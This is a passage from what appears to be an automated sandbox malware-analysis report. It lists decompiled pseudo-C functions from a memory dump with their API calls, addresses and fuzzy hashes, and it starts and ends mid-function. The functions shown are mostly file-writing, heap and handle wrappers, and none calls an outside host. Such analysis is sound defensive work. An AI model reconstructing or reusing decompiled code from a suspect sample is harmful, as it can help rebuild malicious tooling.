					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0x361e688; // 0x33f0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E03605A63( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E03602DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E03604D6E(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E0360A384();
				E0360A384();
				return _t47;
			}

0x03605ae7
0x03605ae7
0x03605af2
0x03605af4
0x03605afa
0x03605b00
0x03605b0a
0x03605b13
0x03605b1e
0x03605b29
0x03605b2f
0x03605b37
0x03605b37
0x03605b3d
0x03605b43
0x03605b46
0x03605b51
0x03605b59
0x03605b5b
0x03605b60
0x03605b80
0x03605b87
0x00000000
0x03605b89
0x03605b89
0x03605b89
0x03605b62
0x03605b62
0x03605b64
0x03605b68
0x00000000
0x03605b6a
0x03605b6a
0x03605b6d
0x03605b73
0x03605b76
0x00000000
0x03605b78
0x00000000
0x03605b78
0x00000000
0x03605b76
0x03605b7e
0x03605b8e
0x03605b90
0x00000000
0x00000000
0x00000000
0x03605b7e
0x03605b68
0x03605b95
0x03605b98
0x03605ba0
0x03605bab

APIs

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

GetDriveTypeW.KERNELBASE(?), ref: 03605B37

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AllocateDriveHeapType
String ID:
API String ID: 414167704-0
Opcode ID: f95afbd9f8269c5ab1bbda0ea653bf49e63f1058ac22f72e1ae96b257b0d6e70
Instruction ID: 0e93d540ee823d7e7dc3fc09434fe63ef06b55638a39f4933bcff7446b4b701d
Opcode Fuzzy Hash: f95afbd9f8269c5ab1bbda0ea653bf49e63f1058ac22f72e1ae96b257b0d6e70
Instruction Fuzzy Hash: 2A21F3386003069BC71CEBA4D4599BBB374FF09760B18412ED9168B7C0EB71A842CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0360E45B, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0360E45B(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0x361e6b0; // 0x530fdd8
				if( *_t5 == 0) {
					_v8 = E036095AD(0x2a7);
					 *0x361e788 = E0360918C(_t6, 0);
					E036085A8( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E036085EA(0x101);
					 *0x361e788 = _t10;
					_t11 =  *0x361e6b0; // 0x530fdd8
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E03608600(0x361e788, 0xffffffff) | 0xffffffff;
					}
				}
			}

0x0360e45e
0x0360e45f
0x0360e467
0x0360e4b1
0x0360e4be
0x0360e4c3
0x00000000
0x0360e469
0x0360e46e
0x0360e475
0x0360e47e
0x0360e485
0x0360e48c
0x0360e490
0x0360e4c8
0x0360e4cb
0x0360e492
0x0360e4a4
0x0360e4a4
0x0360e490

APIs

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0360E502), ref: 0360E48C

Part of subcall function 03608600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,03606020), ref: 03608646

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: Heap$AgentAllocateFreeObtainStringUser
String ID:
API String ID: 471734292-0
Opcode ID: 173143e4a12fb1e5055a7bb97671ec664e872bbc9fa7072a93b6bd5fa238962d
Instruction ID: 3c2d4d5d71899549cc0e0da06a7ffa1e0f05b014b3e29ee2058b4881507786f7
Opcode Fuzzy Hash: 173143e4a12fb1e5055a7bb97671ec664e872bbc9fa7072a93b6bd5fa238962d
Instruction Fuzzy Hash: 54F0AF31704200EBF74DEBB4E80AA5AB7E0AB45320F68465DE411972C4EAB19900D628

Uniqueness

Uniqueness Score: -1.00%

Function 0360A642, Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0360A642(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}

0x0360a642
0x0360a645
0x0360a646
0x0360a649
0x0360a64b
0x0360a64e
0x0360a653
0x0360a684
0x0360a686
0x0360a655
0x0360a655
0x0360a655
0x0360a677
0x00000000
0x00000000
0x0360a679
0x0360a67c
0x0360a682
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0360a682
0x0360a68b
0x0360a68b
0x0360a687
0x0360a68a

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,03608F37,?), ref: 0360A66F

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 788ce177d4dce515f011cee1b40bcd31289b55ba6955f2e0ae359b46d44fa173
Instruction ID: 4f4a0d32265de4fcc6d401ef75b0360962da9dd01b272b871e2d62f146e28179
Opcode Fuzzy Hash: 788ce177d4dce515f011cee1b40bcd31289b55ba6955f2e0ae359b46d44fa173
Instruction Fuzzy Hash: 11F01D72A20218BFDB14DFE8C989BEFB7BCEB05684F154169B509E7144D6B0EA4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 03608600, Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03608600(char _a4, intOrPtr _a8) {
				char _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0360C39D(_t9);
						}
					} else {
						_t4 = E0360C384(_t9);
					}
					E03608735(_t9, 0, _t4);
					_t3 = RtlFreeHeap( *0x361e768, 0, _t9); // executed
				}
				return _t3;
			}

0x03608603
0x03608608
0x0360864e
0x0360864e
0x0360860b
0x0360860f
0x03608611
0x03608614
0x0360861a
0x03608628
0x0360862c
0x0360862c
0x0360861c
0x0360861d
0x03608622
0x03608635
0x03608646
0x03608646
0x00000000

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,03606020), ref: 03608646

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8f0376326f08850893c31066dbdf0ab08f12d76df36e931c5c2c0d5381949569
Instruction ID: 2d910614e8d0ed281b8665405f1b5a10593c1955bdbe4261c57b623ea2264345
Opcode Fuzzy Hash: 8f0376326f08850893c31066dbdf0ab08f12d76df36e931c5c2c0d5381949569
Instruction Fuzzy Hash: E0F0A7315216186BD718E6249C46F9F33588F01671F190245F9189F2C0D7309D208699

Uniqueness

Uniqueness Score: -1.00%

Function 0360A5DD, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360A5DD(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x361e684; // 0x530f6c8
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}

0x0360a5e7
0x0360a5fb
0x0360a600
0x0360a609
0x0360a60b
0x0360a615
0x0360a615
0x00000000
0x0360a61b
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,03608F1F), ref: 0360A5F8

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 321f24e584daee2499a96190aa097cccd21aa512bad09b4b5cda8b234bde6340
Instruction ID: 2a041d87abf459b9124cd9f6ed251265a4e52cf2a5d1990635c601e54caf3832
Opcode Fuzzy Hash: 321f24e584daee2499a96190aa097cccd21aa512bad09b4b5cda8b234bde6340
Instruction Fuzzy Hash: A1E0D8B23102147FE72455A8DDC9F7B166CE7856F9F090275F611C31C0C110CC104670

Uniqueness

Uniqueness Score: -1.00%

Function 0360A763, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360A763(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				void* _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0360A5DD(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0360A642(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						FindCloseChangeNotification(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x0360a76c
0x0360a76d
0x0360a772
0x0360a776
0x0360a785
0x0360a78d
0x0360a79a
0x00000000
0x0360a79d
0x0360a791
0x00000000
0x0360a791
0x00000000

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ee97144db5eabfd3acd6dc4a8f92043bf581b59f2e01b01b3d255a9994caf9a9
Instruction ID: 063ca9205e437c8ee70214506d8a86d59c1644108f43cbd4f93701001c7cd5d0
Opcode Fuzzy Hash: ee97144db5eabfd3acd6dc4a8f92043bf581b59f2e01b01b3d255a9994caf9a9
Instruction Fuzzy Hash: F2E0923A21472567CB2AEAE8D95A89F3769EF452F07608656F826CF2C0DA30D8014684

Uniqueness

Uniqueness Score: -1.00%

Function 0360988C, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360988C(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E0360A4A5( *(_t24 + 0x1c), 0x3a98) >= 0) {
					FindCloseChangeNotification( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E03609830(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}

0x03609890
0x036098a2
0x036098b0
0x036098bd
0x036098c0
0x036098c7
0x036098c7
0x00000000
0x036098cc
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 036098B0

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ad345dca2d7823ba0639d06d203f9a53b2f2da54a634f4f8d6c6dd33287c5247
Instruction ID: 05a5cb431706ad225a1f727dc34bc152d23dbabd9976355fdafd766da4d35e8b
Opcode Fuzzy Hash: ad345dca2d7823ba0639d06d203f9a53b2f2da54a634f4f8d6c6dd33287c5247
Instruction Fuzzy Hash: 72F0A0302007009FD738EF26D884957BBEBEF453507048D2DE98287AA2D731F8058790

Uniqueness

Uniqueness Score: -1.00%

Function 0360B31D, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0360B31D(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x361e684; // 0x530f6c8
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x361e684; // 0x530f6c8
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					FindCloseChangeNotification(_t12);
					return _t13;
				}
				return _t5;
			}

0x0360b31d
0x0360b325
0x0360b32a
0x0360b330
0x0360b334
0x0360b336
0x0360b33b
0x0360b344
0x0360b348
0x0360b348
0x0360b350
0x00000000
0x0360b353
0x0360b357

APIs

FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,03603C8B,?,?,?,?,?,?,?,?,03603D70,00000000), ref: 0360B350

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a38540f719fbf89f042d2d1e89455389391e9db365acf451a18cd1c0aea1fc22
Instruction ID: 495271a09b9e370350f128625121af0ac14916b95e4941fde7a8dbb058939df6
Opcode Fuzzy Hash: a38540f719fbf89f042d2d1e89455389391e9db365acf451a18cd1c0aea1fc22
Instruction Fuzzy Hash: 70E0DF323102209BC3289B69A80CF67BA68EB86A50B0A416DF908C7249CB21C802C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0360A621, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0360A621(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}

0x0360a635
0x0360a638
0x0360a63d
0x0360a641

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0360A6AF,00000000,00000400,00000000,0360F8C0,0360F8C0,?,0360FA61,00000000), ref: 0360A635

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: be6da393e9089491387db3393d6e9b878679d1343869e0da6d1879033a15acc0
Instruction ID: 75b1e76f114c1ef42b479d0a59f48b1965acf3b3dbcab3dd7a4889816955f976
Opcode Fuzzy Hash: be6da393e9089491387db3393d6e9b878679d1343869e0da6d1879033a15acc0
Instruction Fuzzy Hash: 2ED012B13A0200BEFB2C9A34CD5AF72329CD700701F26025C7A06EA0D1CA6AE9148720

Uniqueness

Uniqueness Score: -1.00%

Function 036049A6, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036049A6() {
				int _t3;
				void* _t4;

				_t3 = FindCloseChangeNotification( *0x361e748);
				_t4 =  *0x361e748; // 0x0
				_t5 =  !=  ? 0 : _t4;
				 *0x361e748 =  !=  ? 0 : _t4;
				return _t3;
			}

0x036049b1
0x036049b4
0x036049be
0x036049c1
0x036049c7

APIs

FindCloseChangeNotification.KERNELBASE(03605095), ref: 036049B1

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a52a07763c1f1d2145352f43ecb6dc35244e45853f68837fbc3d7fd531ff7009
Instruction ID: 7ce56543ff306d3ebf183a3d05364128fecb6ba01d247d95aa9fa35a36b48ca5
Opcode Fuzzy Hash: a52a07763c1f1d2145352f43ecb6dc35244e45853f68837fbc3d7fd531ff7009
Instruction Fuzzy Hash: 1AC002B26116099FFB08EB2AE858815B7E6EB8820135D706BF8028662DD732D851DA00

Uniqueness

Uniqueness Score: -1.00%

Function 0360B24F, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360B24F(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}

0x0360b262

APIs

GetFileAttributesW.KERNELBASE(00000000,03604E7E,?,00000000), ref: 0360B255

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b3ddb044b8b5fdec8615cdd9e1076b0e27ba579cf0b5cc6372bdabab15a14b2f
Instruction ID: e7f6f2d2a6acfc9e2c00c7b5c44359d1839af0e4cb86108108badaa727fe6d86
Opcode Fuzzy Hash: b3ddb044b8b5fdec8615cdd9e1076b0e27ba579cf0b5cc6372bdabab15a14b2f
Instruction Fuzzy Hash: BDB012B63301004FCB1C6B389984C4D32905F0D231366075DB033C60E5D731C860AB00

Uniqueness

Uniqueness Score: -1.00%

Function 036085EA, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E036085EA(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x361e768, 8, _a4); // executed
				return _t2;
			}

0x036085f8
0x036085ff

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8c8258ab5fb3cd234b53df5f24ae31828c96ace8569d2116a82ec745c5a4fbbc
Instruction ID: f9b5bcfa4561c5c131073e97b9c8c4f42cab2771fd2e832599f0aa62d42b9ded
Opcode Fuzzy Hash: 8c8258ab5fb3cd234b53df5f24ae31828c96ace8569d2116a82ec745c5a4fbbc
Instruction Fuzzy Hash: 6BB0923248020CFBFB012A91EC09A84BF69E708756F04A012FA0C05069CA73A460DB90

Uniqueness

Uniqueness Score: -1.00%

Function 036085D5, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E036085D5() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x361e768 = _t1;
				return _t1;
			}

0x036085de
0x036085e4
0x036085e9

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,03605F84), ref: 036085DE

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: e8887c0997dcd169034b4330fbc9850b8fe59dd8110589c07cd48c4f05b23144
Instruction ID: 0c6bced708b938e44ed9c7138609f082fe2a0b8fe69398de2164a4dba8540085
Opcode Fuzzy Hash: e8887c0997dcd169034b4330fbc9850b8fe59dd8110589c07cd48c4f05b23144
Instruction Fuzzy Hash: 80B012B068070056F3903B205D4AB003590A304B07F342002B708591CCC6A01000CA04

Uniqueness

Uniqueness Score: -1.00%

Function 0360BCF6, Relevance: 1.4, APIs: 1, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0360BCF6() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0x361e68c; // 0x530f890
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0x361e68c; // 0x530f890
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0x361e68c; // 0x530f890
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0x361e684; // 0x530f6c8
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0x361e684; // 0x530f6c8
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0x361e688; // 0x33f0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0x361e68c; // 0x530f890
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0x361e68c; // 0x530f890
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0x361e68c; // 0x530f890
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0x361e68c; // 0x530f890
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0x361e68c; // 0x530f890
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0x361e68c; // 0x530f890
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}

0x0360bd01
0x0360bd04
0x0360bd0c
0x0360bd12
0x0360bd15
0x0360bd1a
0x0360bd20
0x0360bd21
0x0360bd22
0x0360bd23
0x0360bd24
0x0360bd25
0x0360bd26
0x0360bd27
0x0360bd2a
0x0360bd2d
0x0360bd2f
0x0360bd32
0x0360bd36
0x0360bd39
0x0360bd3a
0x0360bd3f
0x0360bd46
0x0360be3a
0x0360be3e
0x0360be40
0x0360be48
0x0360be48
0x0360be4f
0x0360be51
0x0360be59
0x0360be59
0x0360be5e
0x0360be60
0x0360be66
0x0360be66
0x0360be6d
0x0360be6f
0x0360be77
0x0360be77
0x0360be7b
0x0360be80
0x0360be80
0x0360bd51
0x0360bd54
0x0360bd5b
0x0360bd5c
0x0360bd63
0x0360bd66
0x0360bd6d
0x0360bd70
0x0360bd7b
0x0360bd86
0x00000000
0x00000000
0x00000000
0x0360bd88
0x0360bd88
0x0360bd8b
0x0360bd8c
0x0360bd8d
0x0360bd8e
0x0360bd8f
0x0360bd90
0x0360bd91
0x0360bd92
0x0360bd94
0x0360bd95
0x0360bd99
0x0360bd9a
0x0360bda4
0x00000000
0x0360bdaa
0x0360bdaa
0x0360bdaf
0x0360bdb1
0x0360bdb3
0x0360bdb4
0x0360bdbb
0x0360bdbe
0x0360bdc5
0x0360bdc8
0x0360bdcb
0x0360bdcb
0x0360bdce
0x0360bdd1
0x0360bdd2
0x0360bdd6
0x0360bdd7
0x0360bddc
0x0360bde2
0x00000000
0x00000000
0x0360bdee
0x0360bdf2
0x00000000
0x00000000
0x0360bdf4
0x0360bdfa
0x0360bdfc
0x0360be05
0x00000000
0x00000000
0x0360be07
0x0360be0c
0x0360be0d
0x0360be10
0x0360be12
0x0360be1b
0x00000000
0x00000000
0x0360be20
0x0360be22
0x0360be2a
0x0360be2a
0x0360be2d
0x0360be35
0x00000000
0x0360be35
0x0360bda4

APIs

LocalAlloc.KERNEL32(00000040,00000014), ref: 0360BDE8

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: fd0893acc5b93fe0ffddc8dc8951f99c3798706946d6c9f53fe76d78a0d8b5f0
Instruction ID: e994a8f6548d371bc85e6c93dcaae18fce46a9f8af42e998dc2b6809d0add84e
Opcode Fuzzy Hash: fd0893acc5b93fe0ffddc8dc8951f99c3798706946d6c9f53fe76d78a0d8b5f0
Instruction Fuzzy Hash: 54514AB1A00208EFDB18DF99D949E9EFBB8EF04700F59906AF604AB2A4C371D941DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0360F9CA, Relevance: 1.4, APIs: 1, Instructions: 119
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0360F9CA(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0x361e654; // 0x530fb08
				_t27 = E036085EA( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0x361e654; // 0x530fb08
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E036086C7(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E0360109A(_t63, 0x34a);
						_t66 =  *0x361e688; // 0x33f0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E036095C7(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0x361e688; // 0x33f0000
						_push(_t67);
						_v20 = E036092CB(_t39 + 0x1020);
						_t42 = E0360A68F( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E036085BB( &_v24);
						E036085BB( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0x361e654; // 0x530fb08
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E036086C7(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E03608600( &_v16, _t69); // executed
						E03608600( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0x361e654; // 0x530fb08
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0x361e688; // 0x33f0000
						_t31 = E0360A763(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0x361e654; // 0x530fb08
							continue;
						}
						break;
					}
					E03608600( &_v12, 0);
				}
				return 0;
			}

0x0360f9d0
0x0360f9d8
